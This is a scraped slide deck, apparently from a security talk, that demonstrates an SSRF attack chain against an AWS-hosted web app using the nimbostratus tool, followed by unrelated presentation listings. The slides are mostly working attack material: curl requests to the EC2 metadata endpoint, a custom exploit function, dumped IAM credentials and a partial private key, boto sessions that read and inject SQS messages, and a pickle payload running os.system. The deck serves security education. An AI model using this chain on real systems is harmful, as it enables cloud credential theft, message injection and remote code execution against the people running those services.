http request proxying vulnerability
play

HTTP request proxying vulnerability andres@laptop:~/$ curl - PowerPoint PPT Presentation

Mar 23, 2024 •291 likes •697 views

HTTP request proxying vulnerability andres@laptop:~/$ curl http://target.com/?url=http://httpbin.org/user-agent andres@laptop:~/$ { "user-agent": "python-requests/1.2.3 CPython/2.7.3 Linux/3.2.0-48- virtual" }

  2. HTTP request proxying vulnerability andres@laptop:~/$ curl http://target.com/?url=http://httpbin.org/user-agent andres@laptop:~/$ { "user-agent": "python-requests/1.2.3 CPython/2.7.3 Linux/3.2.0-48- virtual" } andres@laptop:~/$ curl http://httpbin.org/user-agent andres@laptop:~/$ { "user-agent": "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3" } 2 * We use twitter.com as an example. No twitter server(s) were compromised.

  3. Maybe if this is hosted at Amazon... andres@laptop:~/$ curl http://target.com/?\ andres@laptop:~/$ url=http://169.254.169.254/latest/meta-data/ami-id ami-a02f66f2 <---- the http response body me jumping with joy -----> 3

  4. Instance meta-data Each time an EC2 instance starts, AWS attaches a “meta-data ● server” to it, which can be accessed from the instance itself using http://169.254.169.254/ The instance meta-data stores information such as: ● – AMI id: operating system which was used to boot the instance – Private IP address – Instance type: number of cores, memory, etc. – Amazon region 4

  5. The meta-data HTTP server Now we know about the meta-data server and our map of the target architecture looks like: 5 * We use twitter.com as an example. No twitter server(s) were compromised.

  6. Programmatically accessing the meta-data ● Developers use libraries such as boto (Python) and fog (Ruby) to access the instance meta-data in a programmatic way ● The meta-data is always accessed locally , from within the EC2 instance. ● The meta-data is organized in paths , which are well documented. Some paths are static and others change based on the names of objects retrieved from other objects/paths. ● Wrote a wrapper which monkey-patches boto and allows us to use it to retrieve remote meta-data. 6

  7. Monkey-Patching for automated meta-data dump Develop your own core.utils.mangle.mangle function to extract meta-data from this specific target: import requests NOT_FOUND = '404 - Not Found' VULN_URL = 'http://target.com/?url=%s' def mangle(method, uri, headers): mangled_url = VULN_URL % uri logging.debug('Requesting %s' % mangled_url) try : response = requests.get(mangled_url) except Exception , e: logging.exception('Unhandled exception in mangled request: %s' % e) code = 200 if NOT_FOUND in response.text: code = 404 7 return (code, headers, response.text)

  8. Automated meta-data dump with nimbostratus Now that we have our customized mangle function to exploit the vulnerability we can run nimbostratus to dump all meta-data: andres@laptop:~/$ ./nimbostratus -v dump-ec2-metadata --mangle- andres@laptop:~/$ function=core.utils.mangle.mangle Starting dump-ec2-metadata Requesting http://target.com/?url=http://169.254.169.254/latest/meta-data/ Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/instance-type Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/instance-id ... Instance type: t1.micro AMI ID: ami-a02f66f2 Security groups: django_frontend_nimbostratus_sg Availability zone: ap-southeast-1a Architecture: x86_64 Private IP: 10.130.81.89 User data script was written to user-data.txt 8

  9. User-data: OS boot scripts AWS allows you to set a startup script using the EC2 user-data ● parameter when starting a new instance. This is useful for automating the installation and configuration of software on EC2 instances. User-data scripts are run on boot time, Ubuntu has cloud-init ● daemon , and are made available to the instance using it's meta- data The security implications of user-data (*) are know for some time ● now but there aren't any definitive solutions for it 9 * http://alestic.com/2009/06/ec2-user-data-scripts

  10. User data scripts: Full of win #!/usr/bin/python # Where to get the code from REPO = 'git@github.com:andresriancho/nimbostratus-target.git' # How to access the code DEPLOY_PRIVATE_KEY = '''\ -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAu/JhMBoH+XQfMMAVj23hn2VHa2HeDJi3FLri3Be5Ky/qZPSC … 55vBktYGkV3RiPswHiUffTsPG353swZ2P9uAmLUiZ1EjugIEplkMN6XG8c0kXGFp dZdlX50+xrrZFoPRXT7zgepKBVzf7+m1PxViHJxthPw/p0BVbc6OVA== -----END RSA PRIVATE KEY----- ''' DEPLOY_PUBLIC_KEY = '''\ ssh-rsa AAAAB3N...xd4N9TAT0GDFR admin@laptop ''' … def clone_repository(): run_cmd('git clone %s nimbostratus-target' % VULNWEB_REPO) run_cmd('pip install --use-mirrors --upgrade -r requirements.txt', cwd='nimbostratus-target') remove_keys() 10

  11. The keys to the kingdom 11

  12. Cloud applications consume cloud services 12

  13. An Instagram clone consuming AWS services 13

  14. Instance profiles Instance profiles give EC2 instances a way to access AWS services such ● as S3 , SQS, RDS, IAM, etc. Define an IAM Role: “SQS Read access” and then assign it to an instance. ● AWS creates a unique set of credentials for that EC2 instance / instance ● profile and makes them available through meta-data 14

  15. Dumping instance profile credentials andres@laptop:~/$ ./nimbostratus -v dump-credentials --mangle- andres@laptop:~/$ function=core.utils.mangle.mangle Starting dump-credentials Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/iam/security-credentials/ Requesting http://target.com/?url=http://169.254.169.254/latest/meta- data/iam/security-credentials/django_frontend_nimbostratus Found credentials Access key: ASIAJ5BQOUJRD4OPB4SQ Secret key: 73PUhbs7roCKP5zUEwUakH+49US4KTzp0j4oeuwF Token: AQoDYXdzEEwaoAJRYenYVU/KY7L5S3NGR5q9pgwrmcyHEF0XVigxyltxAY2m0cuRLfHd2b/vMxS W8Y2keAa5q4iCV0GlEXVuSpLkj1GL3XB3vU5nbUh0iPHA2GGV4DDXTv8P6NpqWZfuqFBRnvQz37 OtyFUhw6W+dog50BuY48vBW4nPWUriVEMWBKk9cF1voO/W/COHh5rQnKFhVzKUgPdDDzKKKytq2 tS6UzTXFQGNb/v7CYY5Cbp11kYHJWB0pFkodYPF1tt7f0akqBO1dA8OFIoRcHSsh5LBKcaDJDlx 4dkyvcU/nx45Fvq2Z3Twbi7iU6f1RsF8X8puxK+BYe8T/aL6OIYZzNGJDiTwi83pjP7AofbIL0V EPvjIG54DZlN52/cJpL214tsgxOPzkAU= 15 * The target is defined in core.utils.mangle.mangle

  16. Enumerating permissions with nimbostratus Once the credentials were dumped, you can use them from any host, in this particular case to enumerate the permissions: andres@laptop:~/$ ./nimbostratus -v dump-permissions --access-key andres@laptop:~/$ ASIAJ5BQOUJRD4OPB4SQ --secret-key 73PUhbs7roCKP5zUEwUakH+49US4KTzp0j4oeuwF --token AqoDYXdz...nx45FvOPzkAU= Starting dump-permissions Failed to get all users: "User: arn:aws:sts::334918212912:assumed- role/django_frontend_nimbostratus/i-0bb4975c is not authorized to perform: iam:ListUsers on resource: arn:aws:iam::334918212912:user/" DescribeImages is not allowed: "You are not authorized to perform this operation." DescribeInstances is not allowed: "You are not authorized to perform this operation." DescribeInstanceStatus is not allowed: "You are not authorized to perform this operation." ListQueues IS allowed {u'Statement': [{u'Action': ['ListQueues'], u'Effect': u'Allow', u'Resource': u'*'}], u'Version': u'2012-10-17'} 16

  17. Exploring SQS using the instance profile credentials >>> import boto.sqs >>> from boto.sqs.connection import SQSConnection # RegionInfo:ap-southeast-1 >>> region = boto.sqs.regions()[6] >>> conn = SQSConnection(region=region, aws_access_key_id='ASIAJ5BQOUJRD4OPB4SQ', aws_secret_access_key='73PUhbs7roCKP5zUEwUakH+49US4KTzp0j4oeuwF', security_token='AQo...kAU=') >>> conn.get_all_queues() [Queue(https://ap-southeast- 1.queue.amazonaws.com/334918212912/nimbostratus-celery),] >>> q = conn.get_queue('nimbostratus-celery') >>> m = q.get_messages(1)[0] >>> m.get_body() '{"body": "g...3dhcmdzcRF9cRJ1Lg==", "headers": {}, "content-type": "application/x-python-serialize" , "properties": {"body_encoding": "base64", "delivery_info": {"priority": 0, "routing_key": "celery", "exchange": "celery"}, "delivery_mode": 2, "delivery_tag": "c60e66e0- 90e6-4880-9c22-866ba615927e"}, "content-encoding": "binary"}' 17

  18. SQS write access: Yep! Continues Python session from previous slide >>> from boto.sqs.message import Message >>> q = conn.get_queue('nimbostratus-celery') >>> m = Message() >>> m.set_body('The test message') >>> status = q.write(m) >>> status <boto.sqs.message.Message instance at 0x21c25a8> 18

  19. 19

  20. Identified SQS queue and workers The remote architecture looked like this: 20 * We use twitter.com as an example. No twitter server(s) were compromised.

  21. Celery knows it's weaknesses (but uses pickle as it's default anyway) A quote from Celery's documentation: In this case the clients are trusted and the broker is authenticated, but we gained access to the SQS credentials and can inject messages into the SQS queue! 21 * SSL Signing of broker messages is a good fix for this vulnerability

  22. Insecure object (de)serialization widely known vulnerability >>> import cPickle # Expected use >>> cPickle.dumps( ('a', 1) ) "(S'a'\nI1\ntp1\n." >>> cPickle.loads("(S'a'\nI1\ntp1\n.") ('a', 1) # The vulnerability is here: >>> cPickle.loads("cos\nsystem\n(S'ls'\ntR.'\ntR.") . .. foo bar spam eggs 0 >>> 22

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Recap: HTTP request/response HTTP request http://red1.cs.panam.edu/~etomai/links/first.html

Recap: HTTP request/response HTTP request http://red1.cs.panam.edu/~etomai/links/first.html

Recap: HTTP request/response HTTP request http://red1.cs.panam.edu/~etomai/links/first.html Hostname is resolved to IP address (e.g. 129.113.132.218) Request type is GET or POST Client Server Request headers give information about

326 views • 5 slides
DNSSEC and DNS Proxying DNS is hard at scale when you are a huge target 2 CloudFlare

DNSSEC and DNS Proxying DNS is hard at scale when you are a huge target 2 CloudFlare

DNSSEC and DNS Proxying DNS is hard at scale when you are a huge target 2 CloudFlare DNS is big 3 CloudFlare DNS is fast 4 CloudFlare DNS is always under attack 5 CloudFlare A secure reverse proxy for http(s)

538 views • 25 slides
Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request

Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request

Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request An HTTP request consists of: a request method (verb) , resource URL , header fields ( metadata ), body ( data ) HTTP 1.1 defines 9 request

1.47k views • 136 slides
Syscall Proxying Simulating Remote Execution Maximiliano Cceres maximiliano.caceres@corest.com

Syscall Proxying Simulating Remote Execution Maximiliano Cceres maximiliano.caceres@corest.com

Syscall Proxying Simulating Remote Execution Syscall Proxying Simulating Remote Execution Maximiliano Cceres maximiliano.caceres@corest.com Caesars Palace, Las Vegas, NV, USA July 31st, 2002 Syscall Proxying Simulating Remote Execution

779 views • 42 slides
Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day 2 Today's Agenda 1. Integrate HTTP Request to the app 2. Parse JSON Data 3. Sharing Pro Android S - Day 2 HTTP Request &amp; Response Pro

461 views • 13 slides
Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a

Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a

Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a cybersecurity flaw in a system that leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system

407 views • 16 slides
HTTP Persistence &amp; Server parses request, responds, and closes TCP connection Web Caching

HTTP Persistence &amp; Server parses request, responds, and closes TCP connection Web Caching

COMP 431 HTTP Protocol Design Internet Services &amp; Protocols Non-persistent connections The default browser/server behavior in HTTP/1.0 is for the connection to be closed after the completion of the request HTTP Persistence &amp;

138 views • 12 slides
HTTP - Request/ Response HTTP - Documentation HTTP/1.1 is defined by RFC2616 of the IETF

HTTP - Request/ Response HTTP - Documentation HTTP/1.1 is defined by RFC2616 of the IETF

HTTP - Request/ Response HTTP - Documentation HTTP/1.1 is defined by RFC2616 of the IETF https://tools.ietf.org/html/rfc2616 This is THE document for all your questions about HTTP Today we'll discus topics in sections 4, 5, and 6

251 views • 13 slides
WebSocket Server Implementation Chao-Wei Peng HTTP Request Model Service Http Client Http

WebSocket Server Implementation Chao-Wei Peng HTTP Request Model Service Http Client Http

WebSocket Server Implementation Chao-Wei Peng HTTP Request Model Service Http Client Http Server Thread Waiting Http Request Run Service Http Response HTTP Weakness Server sends response only if someone requests it. WebSocket Protocol

274 views • 11 slides
Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE

Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE

Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request An HTTP request consists of: a request method (verb) , resource URL , header fields ( metadata ), body ( data ) HTTP 1.1

1.84k views • 146 slides
PR Web Web Based Customer Requirement Request System http://samhc20144/acquiline/ What is

PR Web Web Based Customer Requirement Request System http://samhc20144/acquiline/ What is

PR Web Web Based Customer Requirement Request System http://samhc20144/acquiline/ What is Acquiline Customer Request Electronic Means of Submitting Purchase Request to Contracting Purchase Request Status Allows Users

1.09k views • 82 slides
Social Media Assignment 1 Concepts Standard HTTP Assignment 0 uses standard HTTP request

Social Media Assignment 1 Concepts Standard HTTP Assignment 0 uses standard HTTP request

Social Media Assignment 1 Concepts Standard HTTP Assignment 0 uses standard HTTP request and response Requests can be GET, POST, etc. req represents request and res represents response. A client sends request to the server, then

518 views • 20 slides
Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a

Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a

Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a significant shock that brings welfare below a socially accepted level (Khl, 2003) Vulnerability increases when there is uncertainty with respect to

529 views • 21 slides
Contents What is vulnerability? Why conduct vulnerability assessments? Defining

Contents What is vulnerability? Why conduct vulnerability assessments? Defining

6/19/2015 Vulnerability and Capacity Assessment Index (VCAI) for Climate Change Adaptation SVRK Prabhakar USAID ADAPT Asia-Pacific Presented at NABARD Training Workshop, Mumbai on 18 June 2015 Contents What is vulnerability? Why

705 views • 21 slides
WWW HTTP, Ajax, APIs, REST HTTP Hypertext Transfer Protocol Request Web Client HTTP Server

WWW HTTP, Ajax, APIs, REST HTTP Hypertext Transfer Protocol Request Web Client HTTP Server

WWW HTTP, Ajax, APIs, REST HTTP Hypertext Transfer Protocol Request Web Client HTTP Server WSGI Response Python Web Application Connectionless Media Independent Stateless WSGI : Web Server Gateway Interface 2 HTTP Methods

395 views • 28 slides
Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1

Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1

Vulnerability Analysis and Food Aid W orking Group Chaired by W FP/ VAM Unit Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1 Overview 1 . Methodology of the VA 2 0 0 4 2 . Highlights of

703 views • 28 slides
Use Saltstack to deploy a full monitoring and supervision stack #cfgmgmtcamp18 Arthur Lutz

Use Saltstack to deploy a full monitoring and supervision stack #cfgmgmtcamp18 Arthur Lutz

Use Saltstack to deploy a full monitoring and supervision stack #cfgmgmtcamp18 Arthur Lutz Logilab #cfgmgmtcamp18 | January 2018 | Arthur Lutz @arthurlutz | Logilab (part of) who am I Arthur Lutz Logilab Python dev / Sysadmin / Debian /

663 views • 26 slides
Censys Retrospective Zakir Durumeric Censys Timeline 2013 ZMap Internet Scanner Release

Censys Retrospective Zakir Durumeric Censys Timeline 2013 ZMap Internet Scanner Release

Censys Retrospective Zakir Durumeric Censys Timeline 2013 ZMap Internet Scanner Release We release ZMap, an open source network scanner capable of scanning IPv4 on one port in 45 minutes. Internet-Wide Scan Data Repository 2014 We

409 views • 10 slides
Step Away From That Database Andrew Godwin DjangoCon 2010 O HAI &quot;&quot;Andrew speaks

Step Away From That Database Andrew Godwin DjangoCon 2010 O HAI &quot;&quot;Andrew speaks

Step Away From That Database Andrew Godwin DjangoCon 2010 O HAI &quot;&quot;Andrew speaks English like a machine gun speaks bullets.&quot;&quot; Reinout van Rees Databases Relational Databases PostgreSQL MySQL SQLite Document Databases

410 views • 27 slides
Biodjango, an open framework for bioinformatics publishing Ennys Gheyouche and Stphane

Biodjango, an open framework for bioinformatics publishing Ennys Gheyouche and Stphane

Biodjango, an open framework for bioinformatics publishing Ennys Gheyouche and Stphane Tletcha Team Protein Design In Silico, UFIP, UMR 6286 CNRS, Universit de Nantes stephane.teletchea@univ-nantes.fr GT MASIM, Paris, November 16 th 2017

516 views • 12 slides
Jean Tabaka, Rally Software So what? Victor Rodrigues Riaan Rottier Simon Sinek The Golden

Jean Tabaka, Rally Software So what? Victor Rodrigues Riaan Rottier Simon Sinek The Golden

The Golden Circle Why How What Jean Tabaka, Rally Software So what? Victor Rodrigues Riaan Rottier Simon Sinek The Golden Circle Why How What Start with Why Why Why Why = Vision Why is our gut Why has emotion and

1.83k views • 135 slides
DARE: A Standards-based Middleware for Science Gateways http://radical.rutgers.edu EGI

DARE: A Standards-based Middleware for Science Gateways http://radical.rutgers.edu EGI

DARE: A Standards-based Middleware for Science Gateways http://radical.rutgers.edu EGI Manchester 09 th April , 2013 Distributed Application Runtime Environment (DARE) Design Objectives: Separation of Concerns: Agile, flexible user

381 views • 19 slides
WATER Wonderful Water Module 2.1 Proudly developed by SMART with funding from Inspiring

WATER Wonderful Water Module 2.1 Proudly developed by SMART with funding from Inspiring

WATER Wonderful Water Module 2.1 Proudly developed by SMART with funding from Inspiring Australia Three States of Matter: Solid, Liquid, Gas Image source: https://pixabay.com/ All matter is made of Atoms! Image source:

388 views • 16 slides
Detection of Amplifiers using Active Measurements Hamza Zafar Advisor: Simon Bauer Oliver Gasser

Detection of Amplifiers using Active Measurements Hamza Zafar Advisor: Simon Bauer Oliver Gasser

Chair of Network Architectures and Services Department of Informatics Technical University of Munich Detection of Amplifiers using Active Measurements Hamza Zafar Advisor: Simon Bauer Oliver Gasser Stefan Metzger Supervisor: Prof. Dr.-Ing.

943 views • 29 slides

More recommend